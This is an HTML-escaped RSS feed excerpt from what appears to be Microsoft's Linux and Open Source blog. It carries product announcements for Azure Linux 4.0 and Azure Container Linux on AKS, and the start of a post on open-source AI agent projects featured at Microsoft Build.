&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="23" data-aria-level="1"&gt;&lt;A style="font-style: normal; font-weight: 400; background-color: rgb(255, 255, 255);" href="https://github.com/microsoft/azurelinux" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Azure Linux on GitHub&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt; &lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="23" data-aria-level="1"&gt;&lt;A style="font-style: normal; font-weight: 400; background-color: rgb(255, 255, 255);" href="https://github.com/microsoft/azurelinux/releases" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Release notes&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI aria-setsize="-1" data-leveltext="●" data-font="" data-listid="1" data-list-defn-props="{&amp;quot;335552541&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559991&amp;quot;:360,&amp;quot;469769242&amp;quot;:[8226],&amp;quot;469777803&amp;quot;:&amp;quot;left&amp;quot;,&amp;quot;469777804&amp;quot;:&amp;quot;●&amp;quot;,&amp;quot;469777815&amp;quot;:&amp;quot;hybridMultilevel&amp;quot;}" data-aria-posinset="23" data-aria-level="1"&gt;&lt;SPAN style="color: rgb(30, 30, 30);" data-ccp-props="{&amp;quot;335559739&amp;quot;:60}"&gt;&lt;SPAN data-teams="true"&gt;Joining the ISV partner program:&amp;nbsp;&lt;A href="mailto:AzureLinuxPartners@microsoft.com" target="_blank" rel="noopener" aria-label="Link AzureLinuxPartners@microsoft.com"&gt;AzureLinuxPartners@microsoft.com&lt;/A&gt;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&lt;STRONG&gt;&lt;SPAN data-contrast="auto"&gt;We're excited to put Azure Linux in your hands. Try it today and let us know what you think.&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/P&gt;</description>
      <pubDate>Wed, 10 Jun 2026 20:56:42 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/announcing-azure-linux-4-0-purpose-built-for-azure-now-in-public/ba-p/4524267</guid>
      <dc:creator>poorvinarang</dc:creator>
      <dc:date>2026-06-10T20:56:42Z</dc:date>
    </item>
    <item>
      <title>Introducing Azure Container Linux (ACL)</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/introducing-azure-container-linux-acl/ba-p/4523411</link>
      <description>&lt;P&gt;Today at Microsoft Build 2026, we’re announcing the general availability of Azure Container Linux (ACL): a secure, immutable container host designed to help platform teams run Kubernetes workloads at scale on Azure Kubernetes Service (AKS) with greater consistency, reduced operational overhead, and a stronger default security posture.&lt;/P&gt;
&lt;P&gt;This release builds on Microsoft’s long-standing commitment to the &lt;A href="https://www.flatcar.org/" target="_blank" rel="noopener"&gt;Flatcar&lt;/A&gt; Container Linux ecosystem as a foundation for secure, minimal, and container-optimized operating systems. This commitment includes the acquisition of &lt;A href="https://azure.microsoft.com/en-us/blog/microsoft-acquires-kinvolk-to-accelerate-containeroptimized-innovation/" target="_blank" rel="noopener"&gt;Kinvolk&lt;/A&gt; in 2021, bringing deep expertise in Flatcar development and cloud-native systems into Azure, and the subsequent donation of Flatcar to the Cloud Native Computing Foundation (CNCF), ensuring its continued growth as a community-driven project.&lt;/P&gt;
&lt;P&gt;Flatcar has played a critical role in helping customers run cloud-native infrastructure at scale, introducing an immutable, minimal OS model that reduces configuration drift, minimizes attack surface, and simplifies lifecycle management. As customer needs continue to grow, there is an increasing demand for deeper integration with cloud platforms, stronger default security enforcement, and a more tightly managed supply chain experience in managed environments like AKS.&lt;/P&gt;
&lt;P&gt;Building on this foundation, Azure Container Linux (ACL) represents the next evolution of this approach. ACL is intentionally built downstream of Flatcar to preserve compatibility with its ecosystem and leverage its mature, battle-tested design. ACL integrates &lt;A href="https://aka.ms/azurelinux" target="_blank" rel="noopener"&gt;Azure Linux&lt;/A&gt; binaries as the core foundation, providing consistency and compatibility with other Azure Linux use cases (including&amp;nbsp;&lt;A href="https://aka.ms/azurelinux-blog" target="_blank" rel="noopener"&gt;Azure Linux VMs&lt;/A&gt;), while bringing enterprise-hardened security and supportability into the platform. Looking ahead, ACL will further incorporate optional advanced code integrity capabilities from &lt;A href="https://learn.microsoft.com/en-us/azure/azure-linux/intro-azure-linux-os-guard" target="_blank" rel="noopener"&gt;Azure Linux with OS Guard&lt;/A&gt;.&lt;/P&gt;
&lt;P&gt;We remain committed to the Flatcar community and will continue contributing innovations upstream while bringing a fully managed, enterprise-ready product to customers through ACL.&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;Why a Trusted, Immutable Host Model Matters for AKS&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;As Kubernetes adoption scales, platform teams face increasing complexity in managing node-level consistency, security, and lifecycle operations across large fleets. Traditional OS models introduce challenges such as:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Configuration drift across nodes, leading to inconsistent behavior and harder-to-debug issues&lt;/LI&gt;
&lt;LI&gt;Fragmented update mechanisms that increase operational overhead and risk during upgrades&lt;/LI&gt;
&lt;LI&gt;Expanding attack surface due to unnecessary packages and mutable system state&lt;/LI&gt;
&lt;LI&gt;Limited visibility and guarantees around the provenance and integrity of OS components&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;In managed environments like AKS, these challenges are amplified as teams look to operate clusters reliably at scale while meeting stricter security and compliance requirements.&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;Azure Container Linux: Built for Consistency and Trust&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;ACL addresses these challenges with a fully image-based operating system model that eliminates configuration drift, ensuring consistent behavior across nodes.&lt;/P&gt;
&lt;P&gt;Updates are delivered through AKS node image upgrades, providing a consistent and repeatable way to roll out OS changes across clusters without relying on in-place modifications. By standardizing how nodes are built, updated, and operated, ACL helps ensure clusters remain in a known-good, reproducible state over time, even as they scale.&lt;/P&gt;
&lt;P&gt;Over time, this model will continue to evolve to support A/B update mechanisms to further improve reliability, speed, and operational efficiency.&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;Secure from the Start, and Designed for the Future&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;ACL is engineered with a hardened security posture from the moment it boots. Its immutable design protects the integrity of the operating system, prevents unauthorized changes, and ensures consistent, reproducible behavior across your Kubernetes fleet. By removing unnecessary components and tightly constraining how the system can be modified, ACL reduces the attack surface and provides a strong foundation for running production workloads with confidence.&lt;/P&gt;
&lt;P&gt;Under the hood, ACL incorporates several safeguards that reinforce its secure-by-default model:&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;&lt;STRONG&gt;Read-only /usr filesystem&lt;/STRONG&gt; to prevent tampering with core system components.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;A minimal package set&lt;/STRONG&gt; purpose-built for container workloads, reducing CVE exposure.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Mandatory access control with SELinux&lt;/STRONG&gt;, enforcing strict least-privilege policies.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Trusted Launch using a Unified Kernel Image (UKI)&lt;/STRONG&gt; to bundle the kernel, initramfs, and kernel command line into a single signed artifact, ensuring integrity from the earliest stage.&lt;/LI&gt;
&lt;LI&gt;&lt;STRONG&gt;Signed Azure Linux RPMs&lt;/STRONG&gt; delivered through a trusted, end-to-end Microsoft supply chain.&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;Going forward, we will continue to evolve ACL’s security posture as we bring over additional innovations from Azure Linux with OS Guard. This includes integrating code integrity into the ACL image, using the &lt;A href="https://docs.kernel.org/next/admin-guide/LSM/ipe.html" target="_blank" rel="noopener"&gt;Integrity Policy Enforcement (IPE)&lt;/A&gt; Linux security module, to ensure that only binaries from trusted, signed volumes are allowed to execute. IPE will also extend to container images, ensuring that only binaries matching a trusted signature can be executed from verified dm-verity backed layers.&lt;/P&gt;
&lt;P&gt;Where applicable, we are committed to contributing these advancements upstream to the Flatcar project, helping strengthen the ecosystem and ensuring that improvements benefit the broader cloud-native community.&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;Differentiating between Azure Container Linux and Existing Container Hosts on AKS&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;AKS now provides multiple generally available Linux OS options, including general-purpose container hosts (Azure Linux and Ubuntu) and an immutable container host (Azure Container Linux).&lt;/P&gt;
&lt;P&gt;While all options are fully supported by Microsoft, they are designed to address distinct operational and security use cases. The sections below highlight the key differences to help you choose and position the right OS for your scenario.&lt;/P&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="width: 99.4444%; height: 269px; border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr style="height: 39px;"&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;&lt;STRONG&gt;&amp;nbsp;&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;&lt;STRONG&gt;General Purpose OS&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;&lt;STRONG&gt;Azure Container Linux&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr style="height: 39px;"&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;&lt;STRONG&gt;Filesystem&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 39px;"&gt;
&lt;P&gt;Writable (read-write)&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 39px;"&gt;Immutable (read-only) /usr with dm-verity guarantees&lt;/td&gt;&lt;/tr&gt;&lt;tr style="height: 42px;"&gt;&lt;td style="height: 42px;"&gt;
&lt;P&gt;&lt;STRONG&gt;Focus on&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 42px;"&gt;
&lt;P&gt;Extensibility, flexibility, and choice.&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 42px;"&gt;Out of the box security and compliance guarantees.&lt;/td&gt;&lt;/tr&gt;&lt;tr style="height: 39px;"&gt;&lt;td style="height: 39px;"&gt;
&lt;P&gt;&lt;STRONG&gt;Mandatory Access Control&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 39px;"&gt;
&lt;P&gt;AppArmor (optional)&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 39px;"&gt;
&lt;P&gt;SELinux (enforcing by default)*&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr style="height: 43px;"&gt;&lt;td style="height: 43px;"&gt;
&lt;P&gt;&lt;STRONG&gt;Secure Boot&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 43px;"&gt;Optional (supported with certain VM sizes)&lt;/td&gt;&lt;td class="lia-align-left" style="height: 43px;"&gt;Supported by default with UKI (Unified Kernel Image)&lt;/td&gt;&lt;/tr&gt;&lt;tr style="height: 67px;"&gt;&lt;td style="height: 67px;"&gt;
&lt;P&gt;&lt;STRONG&gt;Updates&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 67px;"&gt;
&lt;P&gt;Package and Image based updates supported&lt;/P&gt;
&lt;/td&gt;&lt;td class="lia-align-left" style="height: 67px;"&gt;
&lt;P&gt;Only image-based updates supported (A/B update support on the roadmap)&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 22.1811%" /&gt;&lt;col style="width: 38.0248%" /&gt;&lt;col style="width: 39.7955%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&lt;EM&gt;*SELinux policies are subject to change over time based on customer feedback.&lt;/EM&gt;&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;Day‑1 Ecosystem Partner Support&amp;nbsp;&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;Azure Container Linux is launching with support from a broad ecosystem of security, monitoring, networking, and data partners. The following partners are expected to offer support or validated integrations at Day‑1 availability:&amp;nbsp;&lt;/P&gt;
&lt;UL&gt;
&lt;LI&gt;Dynatrace – application performance monitoring and observability.&lt;/LI&gt;
&lt;LI&gt;Aquasec – database platform support on ACL.&lt;/LI&gt;
&lt;LI&gt;Qualys - vulnerability, compliance, and container security.&lt;/LI&gt;
&lt;LI&gt;Upwind - runtime cloud security and risk prioritization.&lt;/LI&gt;
&lt;LI&gt;Elastic - logs, metrics, and observability for Kubernetes.&lt;/LI&gt;
&lt;LI&gt;Isovalent – Kubernetes networking, observability, and security powered by eBPF (Cilium).&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;If you’re interested in becoming a supported Azure Container Linux partner, please reach out to: &lt;A href="mailto:AzureLinuxPartners@microsoft.com" target="_blank" rel="noopener"&gt;AzureLinuxPartners@microsoft.com&lt;/A&gt;&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;What Customers Are Saying&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;Early customer feedback highlights the real‑world impact of Azure Container Linux on improving security posture and operational consistency at scale.&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P class=""&gt;&lt;EM&gt;“We’ve found working closely with the Microsoft product team throughout the Azure Container Linux preview to be invaluable. The product's immutability, minimal footprint, and built‑in security controls (such as SELinux and Trusted Launch) will strengthen our AKS security posture across every deployment instance in Nationwide. Furthermore, its focus on secure‑by‑design foundations is especially timely as we face advanced threat detection capabilities within the industry.” - Enterprise Container Platform, Cloud - Nationwide&lt;/EM&gt;&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H3&gt;&lt;STRONG&gt;Engineered for AKS from Day One&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;Azure Container Linux is deeply integrated with AKS to ensure a seamless operational experience. It is compatible with many critical AKS extensions and add‑ons, and works smoothly with existing application containers and deployment workflows. ACL is available across AMD64 and Arm64 architectures, ensuring consistent behavior across environments, and includes support for GPU-enabled workloads.&lt;/P&gt;
&lt;P&gt;Enabling ACL is as simple as specifying the following in your node pool configuration:&lt;/P&gt;
&lt;P class="lia-align-center"&gt;--os-sku AzureContainerLinux&lt;/P&gt;
&lt;img&gt;Command to provision an Azure Container Linux cluster on AKS using Azure CLI&lt;/img&gt;
&lt;P&gt;Whether you're onboarding new clusters or migrating existing ones, ACL is designed to integrate into your environment with minimal friction.&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;A Clear Path Forward for AKS Preview Users&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;With the release of Azure Container Linux, AKS will transition to offer one unified immutable host offering. This work started with our use of Flatcar Container Linux in Preview and now continues with the GA release of ACL. As part of this release, Flatcar will &lt;A href="https://github.com/Azure/AKS/issues/5648" target="_blank" rel="noopener"&gt;no longer be available&lt;/A&gt; via --os-sku on AKS. Please note, this change applies specifically to the AKS preview experience; Flatcar is not being retired.&lt;/P&gt;
&lt;P&gt;Later this year we will complete the convergence of our immutable OS offerings by incorporating remaining kernel and runtime features of the current OS Guard preview into ACL.&amp;nbsp; At that time, existing users of OS Guard will receive a guided transition to ACL, ensuring operational continuity while consolidating to a single container host.&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;Get Started with Azure Container Linux&lt;/STRONG&gt;&lt;/H3&gt;
&lt;P&gt;ACL is GA and available today for all AKS customers. To begin using ACL in your clusters and explore documentation, best practices, and deployment guidance, visit: &lt;A href="https://aka.ms/azurecontainerlinux" target="_blank" rel="noopener"&gt;aka.ms/azurecontainerlinux&lt;/A&gt;&lt;/P&gt;
&lt;P&gt;ACL represents the future of secure, cloud-optimized Linux on AKS—building on the proven foundation of Flatcar, advancing it with Azure Linux innovations, and contributing back to the open-source ecosystem that customers depend on.&lt;/P&gt;
&lt;P&gt;We’re thrilled to bring this new foundation to our customers and can’t wait to see what you build with it.&lt;/P&gt;
&lt;H3&gt;&lt;STRONG&gt;Learn More &lt;/STRONG&gt;&lt;/H3&gt;
&lt;UL&gt;
&lt;LI&gt;//Build Session: &lt;A href="https://build.microsoft.com/en-US/sessions/OD827?source=sessions" target="_blank" rel="noopener"&gt;Build, deploy, and run Linux workloads on Azure&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Azure Container Linux documentation:&amp;nbsp;&lt;A href="https://aka.ms/azurecontainerlinux" target="_blank" rel="noopener"&gt;https://aka.ms/azurecontainerlinux&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Azure Container Linux on GitHub: &lt;A href="https://github.com/microsoft/azure-container-linux" target="_blank" rel="noopener"&gt;https://github.com/microsoft/azure-container-linux&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Azure Linux product page: &lt;A href="https://aka.ms/AzureLinuxProduct" target="_blank" rel="noopener"&gt;https://aka.ms/AzureLinuxProduct&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Azure Linux documentation: &lt;A href="https://aka.ms/azurelinux" target="_blank" rel="noopener"&gt;https://aka.ms/azurelinux&lt;/A&gt;&lt;/LI&gt;
&lt;LI&gt;Joining the ISV partner program:&amp;nbsp;&lt;A style="font-style: normal; font-weight: 400; background-color: rgb(255, 255, 255);" href="mailto:AzureLinuxPartners@microsoft.com" target="_blank" rel="noopener"&gt;AzureLinuxPartners@microsoft.com&lt;/A&gt;&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Tue, 02 Jun 2026 20:00:00 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/introducing-azure-container-linux-acl/ba-p/4523411</guid>
      <dc:creator>FloraTaagen</dc:creator>
      <dc:date>2026-06-02T20:00:00Z</dc:date>
    </item>
    <item>
      <title>Four open source projects to explore at Microsoft Build</title>
      <link>https://techcommunity.microsoft.com/t5/linux-and-open-source-blog/four-open-source-projects-to-explore-at-microsoft-build/ba-p/4523744</link>
      <description>&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Open source is where developers experiment, collaborate, and turn&amp;nbsp;new ideas&amp;nbsp;into tools that others can build on. At&amp;nbsp;&lt;/SPAN&gt;&lt;A href="https://build.microsoft.com/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Microsoft Build&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;,&amp;nbsp;we’re&amp;nbsp;creating a dedicated space for that energy: the&amp;nbsp;Open Source&amp;nbsp;Zone.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;This year, the&amp;nbsp;Open Source&amp;nbsp;Zone will bring together maintainers, contributors, and developers working on some of the most interesting&amp;nbsp;open source&amp;nbsp;projects in AI. Whether&amp;nbsp;you’re&amp;nbsp;building agents, experimenting with local models, exploring prompt workflows, or looking for practical ways to bring AI into your development process, this is a place to meet the people behind the projects and see what&amp;nbsp;they’re&amp;nbsp;building.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;The&amp;nbsp;Open Source&amp;nbsp;Zone is inspired by similar community spaces&amp;nbsp;we’ve&amp;nbsp;hosted at GitHub Universe: hands-on, conversation-driven, and centered on the people and projects moving open source forward.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H2 aria-level="2"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 2"&gt;Meet the projects&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335559738&amp;quot;:160,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H2&gt;
&lt;H3 aria-level="3"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;OpenClaw&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335559738&amp;quot;:160,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;A href="https://openclaw.ai/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;O&lt;/SPAN&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;penClaw&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;, originally&amp;nbsp;Clawbot&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;,&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;formerly&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;Clawdbot&amp;nbsp;and&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;briefly&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;Moltbot&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;,&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;before&amp;nbsp;landing on its current name&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;(&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;because naming is hard&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;)&lt;/SPAN&gt;&lt;SPAN data-contrast="auto"&gt;, is a&amp;nbsp;personal AI assistant project built for developers who want more control over how AI agents run across tools, devices, and workflows. Its repository describes it as “your own personal AI assistant” across operating systems and platforms, with support for agent workspaces, skills, and device nodes.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;It has also become one of the fastest-growing&amp;nbsp;open source&amp;nbsp;projects on GitHub, with&amp;nbsp;over 370,000 stars to date.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;At the&amp;nbsp;Open Source&amp;nbsp;Zone, attendees can learn how&amp;nbsp;OpenClaw&amp;nbsp;approaches personal agents, extensibility, and local-first experimentation.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3 aria-level="3"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;AutoGPT&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335559738&amp;quot;:160,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;A href="https://agpt.co/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;AutoGPT&lt;/SPAN&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;is one of the best-known&amp;nbsp;open source&amp;nbsp;projects in the autonomous agent space. The project’s mission is to make AI accessible for everyone to use and build on, with tools for building, testing, and delegating work to agents.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;Visit&amp;nbsp;AutoGPT&amp;nbsp;in the&amp;nbsp;Open Source&amp;nbsp;Zone to learn how the project is evolving agent development, benchmarking, frontend experiences, and practical workflows for building agent-powered applications.&amp;nbsp;Come for the autonomous agents; stay for the very human maintainers.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335559738&amp;quot;:240,&amp;quot;335559739&amp;quot;:240}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;AutoGPT&amp;nbsp;is also a&amp;nbsp;&lt;/SPAN&gt;&lt;A href="https://agpt.co/blog/autogpt-partners-with-github-for-ai-security" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;member of GitHub’s Secure&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Open Source&lt;/SPAN&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;&amp;nbsp;Fund&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;, with a goal of enhancing AI security across the&amp;nbsp;open source&amp;nbsp;ecosystem.&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;H3 aria-level="3"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;Open&amp;nbsp;&lt;/SPAN&gt;&lt;SPAN data-ccp-parastyle="heading 3"&gt;WebUI&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{&amp;quot;134245418&amp;quot;:true,&amp;quot;134245529&amp;quot;:true,&amp;quot;335559738&amp;quot;:160,&amp;quot;335559739&amp;quot;:80}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/H3&gt;
&lt;P&gt;&lt;A href="https://openwebui.com/" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Open WebUI&amp;nbsp;&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-contrast="auto"&gt;is a self-hosted, extensible AI platform for working with large language models. The project supports&amp;nbsp;Ollama&amp;nbsp;and OpenAI-compatible APIs and includes built-in RAG capabilities, making it a strong&amp;nbsp;option&amp;nbsp;for developers and organizations exploring local, private, or provider-flexible AI experiences.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN data-contrast="auto"&gt;At Build, the Open&amp;nbsp;WebUI&amp;nbsp;team will show how developers can run, customize, and extend AI interfaces for their own environments.&lt;/SPAN&gt;&lt;SPAN data-ccp-props="{}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
